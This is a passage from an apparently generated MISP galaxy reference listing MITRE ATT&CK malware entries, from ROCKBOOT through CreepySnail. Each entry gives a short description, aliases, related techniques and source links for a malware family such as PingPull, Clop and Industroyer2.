ROCKBOOT - S0112 is also known as:

  • ROCKBOOT

ROCKBOOT - S0112 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"

Table 7390. Table References

Links

https://attack.mitre.org/software/S0112

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

DnsSystem - S1021

[DnsSystem](https://attack.mitre.org/software/S1021) is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2022.(Citation: Zscaler Lyceum DnsSystem June 2022)

The tag is: misp-galaxy:mitre-malware="DnsSystem - S1021"

DnsSystem - S1021 is also known as:

  • DnsSystem

Table 7391. Table References

Links

https://attack.mitre.org/software/S1021

https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor

PowerLess - S1012

[PowerLess](https://attack.mitre.org/software/S1012) is a PowerShell-based modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Cybereason PowerLess February 2022)

The tag is: misp-galaxy:mitre-malware="PowerLess - S1012"

PowerLess - S1012 is also known as:

  • PowerLess

Table 7392. Table References

Links

https://attack.mitre.org/software/S1012

https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage

Linfo - S0211

[Linfo](https://attack.mitre.org/software/S0211) is a rootkit trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Linfo May 2012)

The tag is: misp-galaxy:mitre-malware="Linfo - S0211"

Linfo - S0211 is also known as:

  • Linfo

Linfo - S0211 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 7393. Table References

Links

https://attack.mitre.org/software/S0211

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051605-2535-99

PS1 - S0613

[PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)

The tag is: misp-galaxy:mitre-malware="PS1 - S0613"

PS1 - S0613 is also known as:

  • PS1

Table 7394. Table References

Links

https://attack.mitre.org/software/S0613

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

TINYTYPHON - S0131

[TINYTYPHON](https://attack.mitre.org/software/S0131) is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. (Citation: Forcepoint Monsoon)

The tag is: misp-galaxy:mitre-malware="TINYTYPHON - S0131"

TINYTYPHON - S0131 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7395. Table References

Links

https://attack.mitre.org/software/S0131

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

PingPull - S1031

[PingPull](https://attack.mitre.org/software/S1031) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://attack.mitre.org/groups/G0093) since at least June 2022. [PingPull](https://attack.mitre.org/software/S1031) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.(Citation: Unit 42 PingPull Jun 2022)

The tag is: misp-galaxy:mitre-malware="PingPull - S1031"

PingPull - S1031 is also known as:

  • PingPull

Table 7396. Table References

Links

https://attack.mitre.org/software/S1031

https://unit42.paloaltonetworks.com/pingpull-gallium/

Prikormka - S0113

[Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)

The tag is: misp-galaxy:mitre-malware="Prikormka - S0113"

Prikormka - S0113 is also known as:

  • Prikormka

Prikormka - S0113 has relationships with:

  • similar: misp-galaxy:tool="Prikormka" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7397. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf

https://attack.mitre.org/software/S0113

YiSpecter - S0311

[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)

The tag is: misp-galaxy:mitre-malware="YiSpecter - S0311"

YiSpecter - S0311 is also known as:

  • YiSpecter

YiSpecter - S0311 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Abuse of iOS Enterprise App Signing Key - T1445" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 7398. Table References

Links

https://attack.mitre.org/software/S0311

https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/

ZxxZ - S1013

[ZxxZ](https://attack.mitre.org/software/S1013) is a trojan written in Visual C++ that has been used by [BITTER](https://attack.mitre.org/groups/G1002) since at least August 2021, including against Bangladeshi government personnel.(Citation: Cisco Talos Bitter Bangladesh May 2022)

The tag is: misp-galaxy:mitre-malware="ZxxZ - S1013"

Table 7399. Table References

Links

https://attack.mitre.org/software/S1013

https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

BOOTRASH - S0114

[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that targets Windows operating systems. It has been used by threat actors that target the financial sector.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)

The tag is: misp-galaxy:mitre-malware="BOOTRASH - S0114"

BOOTRASH - S0114 is also known as:

  • BOOTRASH

BOOTRASH - S0114 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"

Table 7400. Table References

Links

https://attack.mitre.org/software/S0114

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf

DanBot - S1014

[DanBot](https://attack.mitre.org/software/S1014) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least 2018.(Citation: SecureWorks August 2019)

The tag is: misp-galaxy:mitre-malware="DanBot - S1014"

DanBot - S1014 is also known as:

  • DanBot

Table 7401. Table References

Links

https://attack.mitre.org/software/S1014

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

Chinoxy - S1041

[Chinoxy](https://attack.mitre.org/software/S1041) is a backdoor that has been used since at least November 2018, during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign, to gain persistence and drop additional payloads. According to security researchers, [Chinoxy](https://attack.mitre.org/software/S1041) has been used by Chinese-speaking threat actors.(Citation: Bitdefender FunnyDream Campaign November 2020)

The tag is: misp-galaxy:mitre-malware="Chinoxy - S1041"

Chinoxy - S1041 is also known as:

  • Chinoxy

Table 7402. Table References

Links

https://attack.mitre.org/software/S1041

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

Rotexy - S0411

[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality.(Citation: securelist rotexy 2018)

The tag is: misp-galaxy:mitre-malware="Rotexy - S0411"

Rotexy - S0411 is also known as:

  • Rotexy

Table 7403. Table References

Links

https://attack.mitre.org/software/S0411

https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

HALFBAKED - S0151

[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)

The tag is: misp-galaxy:mitre-malware="HALFBAKED - S0151"

HALFBAKED - S0151 has relationships with:

  • similar: misp-galaxy:tool="VB Flash" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7404. Table References

Links

https://attack.mitre.org/software/S0151

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

Crimson - S0115

[Crimson](https://attack.mitre.org/software/S0115) is a remote access Trojan that has been used by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2016.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)

The tag is: misp-galaxy:mitre-malware="Crimson - S0115"

Crimson - S0115 is also known as:

  • Crimson

  • MSIL/Crimson

Crimson - S0115 has relationships with:

  • similar: misp-galaxy:tool="Crimson" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="Crimson" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7405. Table References

Links

https://attack.mitre.org/software/S0115

https://securelist.com/transparent-tribe-part-1/98127/

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

RegDuke - S0511

[RegDuke](https://attack.mitre.org/software/S0511) is a first stage implant written in .NET and used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2017. [RegDuke](https://attack.mitre.org/software/S0511) has been used to control a compromised machine when control of other implants on the machine was lost.(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="RegDuke - S0511"

RegDuke - S0511 is also known as:

  • RegDuke

Table 7406. Table References

Links

https://attack.mitre.org/software/S0511

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

KEYPLUG - S1051

[KEYPLUG](https://attack.mitre.org/software/S1051) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least June 2021.(Citation: Mandiant APT41)

The tag is: misp-galaxy:mitre-malware="KEYPLUG - S1051"

KEYPLUG - S1051 is also known as:

  • KEYPLUG

  • KEYPLUG.LINUX

Table 7407. Table References

Links

https://attack.mitre.org/software/S1051

https://www.mandiant.com/resources/apt41-us-state-governments

Milan - S1015

[Milan](https://attack.mitre.org/software/S1015) is a backdoor implant based on [DanBot](https://attack.mitre.org/software/S1014) that was written in Visual C++ and .NET. [Milan](https://attack.mitre.org/software/S1015) has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)

The tag is: misp-galaxy:mitre-malware="Milan - S1015"

Milan - S1015 is also known as:

  • Milan

  • James

Table 7408. Table References

Links

https://attack.mitre.org/software/S1015

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns

https://www.clearskysec.com/siamesekitten/

AbstractEmu - S1061

[AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States, however victims are believed to be across a total of 17 countries.(Citation: lookout_abstractemu_1021)

The tag is: misp-galaxy:mitre-malware="AbstractEmu - S1061"

AbstractEmu - S1061 is also known as:

  • AbstractEmu

Table 7409. Table References

Links

https://attack.mitre.org/software/S1061

https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign

XAgentOSX - S0161

[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)

The tag is: misp-galaxy:mitre-malware="XAgentOSX - S0161"

XAgentOSX - S0161 is also known as:

  • XAgentOSX

  • OSX.Sofacy

XAgentOSX - S0161 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7410. Table References

Links

https://attack.mitre.org/software/S0161

https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

Clop - S0611

[Clop](https://attack.mitre.org/software/S0611) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://attack.mitre.org/software/S0611) is a variant of the CryptoMix ransomware.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)(Citation: Unit42 Clop April 2021)

The tag is: misp-galaxy:mitre-malware="Clop - S0611"

Clop - S0611 is also known as:

  • Clop

Table 7411. Table References

Links

https://attack.mitre.org/software/S0611

https://unit42.paloaltonetworks.com/clop-ransomware/

https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/

MacMa - S1016

[MacMa](https://attack.mitre.org/software/S1016) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://attack.mitre.org/software/S1016) has been observed in the wild since November 2021.(Citation: ESET DazzleSpy Jan 2022)

The tag is: misp-galaxy:mitre-malware="MacMa - S1016"

MacMa - S1016 is also known as:

  • MacMa

  • OSX.CDDS

  • DazzleSpy

Table 7412. Table References

Links

https://attack.mitre.org/software/S1016

https://objective-see.org/blog/blog_0x69.html

https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/

Felismus - S0171

[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)

The tag is: misp-galaxy:mitre-malware="Felismus - S0171"

Felismus - S0171 is also known as:

  • Felismus

Felismus - S0171 has relationships with:

  • similar: misp-galaxy:malpedia="Felismus" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7413. Table References

Links

https://attack.mitre.org/software/S0171

https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

OutSteel - S1017

[OutSteel](https://attack.mitre.org/software/S1017) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )

The tag is: misp-galaxy:mitre-malware="OutSteel - S1017"

Table 7414. Table References

Links

https://attack.mitre.org/software/S1017

https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

XTunnel - S0117

[XTunnel](https://attack.mitre.org/software/S0117) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-malware="XTunnel - S0117"

XTunnel - S0117 is also known as:

  • XTunnel

  • Trojan.Shunnael

  • X-Tunnel

  • XAPS

XTunnel - S0117 has relationships with:

  • similar: misp-galaxy:malpedia="XTunnel" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="X-Tunnel" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 7415. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

https://attack.mitre.org/software/S0117

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

BADHATCH - S1081

[BADHATCH](https://attack.mitre.org/software/S1081) is a backdoor that has been utilized by [FIN8](https://attack.mitre.org/groups/G0061) since at least 2019. [BADHATCH](https://attack.mitre.org/software/S1081) has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021)

The tag is: misp-galaxy:mitre-malware="BADHATCH - S1081"

BADHATCH - S1081 is also known as:

  • BADHATCH

Table 7416. Table References

Links

https://attack.mitre.org/software/S1081

https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/

https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf

FALLCHILL - S0181

[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)

The tag is: misp-galaxy:mitre-malware="FALLCHILL - S0181"

FALLCHILL - S0181 is also known as:

  • FALLCHILL

FALLCHILL - S0181 has relationships with:

  • similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="FALLCHILL" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7417. Table References

Links

https://attack.mitre.org/software/S0181

https://www.us-cert.gov/ncas/alerts/TA17-318A

Nidiran - S0118

[Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)

The tag is: misp-galaxy:mitre-malware="Nidiran - S0118"

Nidiran - S0118 is also known as:

  • Nidiran

  • Backdoor.Nidiran

Nidiran - S0118 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7418. Table References

Links

http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

https://attack.mitre.org/software/S0118

Shark - S1019

[Shark](https://attack.mitre.org/software/S1019) is a backdoor malware written in C# and .NET that is an updated version of [Milan](https://attack.mitre.org/software/S1015); it has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least July 2021.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)

The tag is: misp-galaxy:mitre-malware="Shark - S1019"

Shark - S1019 is also known as:

  • Shark

Table 7419. Table References

Links

https://attack.mitre.org/software/S1019

https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns

https://www.clearskysec.com/siamesekitten/

Concipit1248 - S0426

[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)

The tag is: misp-galaxy:mitre-malware="Concipit1248 - S0426"

Concipit1248 - S0426 is also known as:

  • Concipit1248

  • Corona Updates

Table 7420. Table References

Links

https://attack.mitre.org/software/S0426

https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/

Industroyer2 - S1072

[Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)

The tag is: misp-galaxy:mitre-malware="Industroyer2 - S1072"

Industroyer2 - S1072 is also known as:

  • Industroyer2

Table 7421. Table References

Links

https://attack.mitre.org/software/S1072

https://www.youtube.com/watch?v=xC9iM5wVedQ

CORALDECK - S0212

[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="CORALDECK - S0212"

CORALDECK - S0212 is also known as:

  • CORALDECK

CORALDECK - S0212 has relationships with:

  • similar: misp-galaxy:tool="CORALDECK" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002" with estimative-language:likelihood-probability="almost-certain"

Table 7422. Table References

Links

https://attack.mitre.org/software/S0212

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

IceApple - S1022

[IceApple](https://attack.mitre.org/software/S1022) is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.(Citation: CrowdStrike IceApple May 2022)

The tag is: misp-galaxy:mitre-malware="IceApple - S1022"

IceApple - S1022 is also known as:

  • IceApple

Table 7423. Table References

Links

https://attack.mitre.org/software/S1022

https://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf

Umbreon - S0221

A Linux rootkit that provides backdoor access and hides from defenders.

The tag is: misp-galaxy:mitre-malware="Umbreon - S0221"

Umbreon - S0221 is also known as:

  • Umbreon

Umbreon - S0221 has relationships with:

  • similar: misp-galaxy:tool="Umbreon" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Umbreon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 7424. Table References

Links

https://attack.mitre.org/software/S0221

https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046

ccf32 - S1043

[ccf32](https://attack.mitre.org/software/S1043) is data collection malware that has been used since at least February 2019, most notably during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign; there is also a similar x64 version.(Citation: Bitdefender FunnyDream Campaign November 2020)

The tag is: misp-galaxy:mitre-malware="ccf32 - S1043"

ccf32 - S1043 is also known as:

  • ccf32

Table 7425. Table References

Links

https://attack.mitre.org/software/S1043

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

DOGCALL - S0213

[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="DOGCALL - S0213"

DOGCALL - S0213 is also known as:

  • DOGCALL

DOGCALL - S0213 has relationships with:

  • similar: misp-galaxy:tool="DOGCALL" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 7426. Table References

Links

https://attack.mitre.org/software/S0213

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

PyDCrypt - S1032

[PyDCrypt](https://attack.mitre.org/software/S1032) is malware written in Python designed to deliver [DCSrv](https://attack.mitre.org/software/S1033). It has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021, with each sample tailored for its intended victim organization.(Citation: Checkpoint MosesStaff Nov 2021)

The tag is: misp-galaxy:mitre-malware="PyDCrypt - S1032"

PyDCrypt - S1032 is also known as:

  • PyDCrypt

Table 7427. Table References

Links

https://attack.mitre.org/software/S1032

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

CreepyDrive - S1023

[CreepyDrive](https://attack.mitre.org/software/S1023) is a custom implant has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.(Citation: Microsoft POLONIUM June 2022)

[POLONIUM](https://attack.mitre.org/groups/G1005) has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.(Citation: Microsoft POLONIUM June 2022)

The tag is: misp-galaxy:mitre-malware="CreepyDrive - S1023"

CreepyDrive - S1023 is also known as:

  • CreepyDrive

Table 7428. Table References

Links

https://attack.mitre.org/software/S1023

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

HummingWhale - S0321

[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. (Citation: ArsTechnica-HummingWhale)

The tag is: misp-galaxy:mitre-malware="HummingWhale - S0321"

HummingWhale - S0321 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"

Table 7429. Table References

Links

http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/

https://attack.mitre.org/software/S0321

WireLurker - S0312

[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)

The tag is: misp-galaxy:mitre-malware="WireLurker - S0312"

WireLurker - S0312 has relationships with:

  • similar: misp-galaxy:malpedia="WireLurker (OS X)" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 7430. Table References

Links

https://attack.mitre.org/software/S0312

https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

RATANKBA - S0241

[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)

The tag is: misp-galaxy:mitre-malware="RATANKBA - S0241"

RATANKBA - S0241 is also known as:

  • RATANKBA

Table 7431. Table References

Links

https://attack.mitre.org/software/S0241

https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/

https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html

SUGARDUMP - S1042

[SUGARDUMP](https://attack.mitre.org/software/S1042) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://attack.mitre.org/campaigns/C0010) campaign. The first known [SUGARDUMP](https://attack.mitre.org/software/S1042) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.(Citation: Mandiant UNC3890 Aug 2022)

The tag is: misp-galaxy:mitre-malware="SUGARDUMP - S1042"

SUGARDUMP - S1042 is also known as:

  • SUGARDUMP

Table 7432. Table References

Links

https://attack.mitre.org/software/S1042

https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping

HAPPYWORK - S0214

[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="HAPPYWORK - S0214"

HAPPYWORK - S0214 has relationships with:

  • similar: misp-galaxy:tool="HAPPYWORK" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7433. Table References

Links

https://attack.mitre.org/software/S0214

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

CreepySnail - S1024

[CreepySnail](https://attack.mitre.org/software/S1024) is a custom PowerShell implant that has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least 2022.(Citation: Microsoft POLONIUM June 2022)

The tag is: misp-galaxy:mitre-malware="CreepySnail - S1024"

CreepySnail - S1024 is also known as:

  • CreepySnail

Table 7434. Table References

Links

https://attack.mitre.org/software/S1024

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

StreamEx - S0142

